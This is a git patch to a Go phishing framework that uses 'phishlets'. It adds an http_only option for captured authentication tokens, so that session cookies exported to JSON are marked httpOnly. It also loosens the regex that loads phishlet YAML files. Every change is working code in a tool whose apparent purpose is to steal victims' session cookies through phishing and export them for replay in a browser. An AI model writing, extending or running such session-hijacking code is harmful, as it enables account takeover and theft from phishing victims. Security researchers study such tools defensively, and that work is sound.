From 2678d3c0f831547ce9034ef20fad4ac9437af3c2 Mon Sep 17 00:00:00 2001
From: Kuba Gretzky <kuba@breakdev.org>
Date: Sat, 8 Sep 2018 16:02:48 +0200
Subject: [PATCH] added optional http_only flag for cookies

---
 core/phishlet.go | 25 +++++++++++++++++++++----
 core/terminal.go | 14 ++++++++++++--
 main.go          |  2 +-
 3 files changed, 34 insertions(+), 7 deletions(-)

diff --git a/core/phishlet.go b/core/phishlet.go
index 8fb4b79c3..c8077608c 100644
--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -34,6 +34,7 @@ type Phishlet struct {
 	domains      []string
 	subfilters   map[string][]SubFilter
 	authTokens   map[string][]string
+	httpTokens   map[string][]string
 	k_username   string
 	re_username  string
 	k_password   string
@@ -61,8 +62,9 @@ type ConfigSubFilter struct {
 }
 
 type ConfigAuthToken struct {
-	Domain string   `mapstructure:"domain"`
-	Keys   []string `mapstructure:"keys"`
+	Domain   string   `mapstructure:"domain"`
+	Keys     []string `mapstructure:"keys"`
+	HttpOnly []string `mapstructure:"http_only"`
 }
 
 type ConfigUserRegex struct {
@@ -106,6 +108,7 @@ func (p *Phishlet) Clear() {
 	p.domains = []string{}
 	p.subfilters = make(map[string][]SubFilter)
 	p.authTokens = make(map[string][]string)
+	p.httpTokens = make(map[string][]string)
 	p.k_username = ""
 	p.re_username = ""
 	p.k_password = ""
@@ -143,7 +146,7 @@ func (p *Phishlet) LoadFromFile(path string) error {
 		p.addSubFilter(sf.Hostname, sf.Sub, sf.Domain, sf.Mimes, sf.Search, sf.Replace, sf.RedirectOnly)
 	}
 	for _, at := range fp.AuthTokens {
-		p.addAuthTokens(at.Domain, at.Keys)
+		p.addAuthTokens(at.Domain, at.Keys, at.HttpOnly)
 	}
 	p.re_username = fp.UserRegex.Re
 	p.k_username = fp.UserRegex.Key
@@ -235,8 +238,9 @@ func (p *Phishlet) addSubFilter(hostname string, subdomain string, domain string
 	p.subfilters[hostname] = append(p.subfilters[hostname], SubFilter{subdomain: subdomain, domain: domain, mime: mime, regexp: regexp, replace: replace, redirect_only: redirect_only})
 }
 
-func (p *Phishlet) addAuthTokens(hostname string, tokens []string) {
+func (p *Phishlet) addAuthTokens(hostname string, tokens []string, http_tokens []string) {
 	p.authTokens[hostname] = tokens
+	p.httpTokens[hostname] = http_tokens
 }
 
 func (p *Phishlet) getAuthTokens() []string {
@@ -274,6 +278,19 @@ func (p *Phishlet) domainExists(domain string) bool {
 	return false
 }
 
+func (p *Phishlet) isTokenHttpOnly(domain string, token string) bool {
+	for d, tokens := range p.httpTokens {
+		if domain == d {
+			for _, tk := range tokens {
+				if tk == token {
+					return true
+				}
+			}
+		}
+	}
+	return false
+}
+
 func (p *Phishlet) MimeExists(mime string) bool {
 	return false
 }
diff --git a/core/terminal.go b/core/terminal.go
index 67eec5fb8..5795253f8 100644
--- a/core/terminal.go
+++ b/core/terminal.go
@@ -237,6 +237,12 @@ func (t *Terminal) handleSessions(args []string) error {
 		s_found := false
 		for _, s := range sessions {
 			if s.Id == id {
+				pl, err := t.cfg.GetPhishlet(s.Phishlet)
+				if err != nil {
+					log.Error("%v", err)
+					break
+				}
+
 				s_found = true
 				tcol := dgray.Sprintf("empty")
 				if len(s.Tokens) > 0 {
@@ -248,7 +254,7 @@ func (t *Terminal) handleSessions(args []string) error {
 				log.Printf("\n%s\n", AsRows(keys, vals))
 
 				if len(s.Tokens) > 0 {
-					json_tokens := t.tokensToJSON(s.Tokens)
+					json_tokens := t.tokensToJSON(pl, s.Tokens)
 					t.output("%s", json_tokens)
 				}
 				break
@@ -468,13 +474,14 @@ func (t *Terminal) createHelp() {
 	t.hlp = h
 }
 
-func (t *Terminal) tokensToJSON(tokens map[string]map[string]string) string {
+func (t *Terminal) tokensToJSON(pl *Phishlet, tokens map[string]map[string]string) string {
 	type Cookie struct {
 		Path           string `json:"path"`
 		Domain         string `json:"domain"`
 		ExpirationDate int64  `json:"expirationDate"`
 		Value          string `json:"value"`
 		Name           string `json:"name"`
+		HttpOnly       bool   `json:"httpOnly,omitempty"`
 	}
 
 	var cookies []*Cookie
@@ -487,6 +494,9 @@ func (t *Terminal) tokensToJSON(tokens map[string]map[string]string) string {
 				Value:          v,
 				Name:           k,
 			}
+			if pl.isTokenHttpOnly(domain, k) {
+				c.HttpOnly = true
+			}
 			cookies = append(cookies, c)
 		}
 	}
diff --git a/main.go b/main.go
index 7c8482743..74f6173cc 100644
--- a/main.go
+++ b/main.go
@@ -96,7 +96,7 @@ func main() {
 	}
 	for _, f := range files {
 		if !f.IsDir() {
-			pr := regexp.MustCompile(`([a-zA-Z0-9]*)\.yaml`)
+			pr := regexp.MustCompile(`([a-zA-Z0-9\-\.]*)\.yaml`)
 			rpname := pr.FindStringSubmatch(f.Name())
 			if rpname == nil || len(rpname) < 2 {
 				continue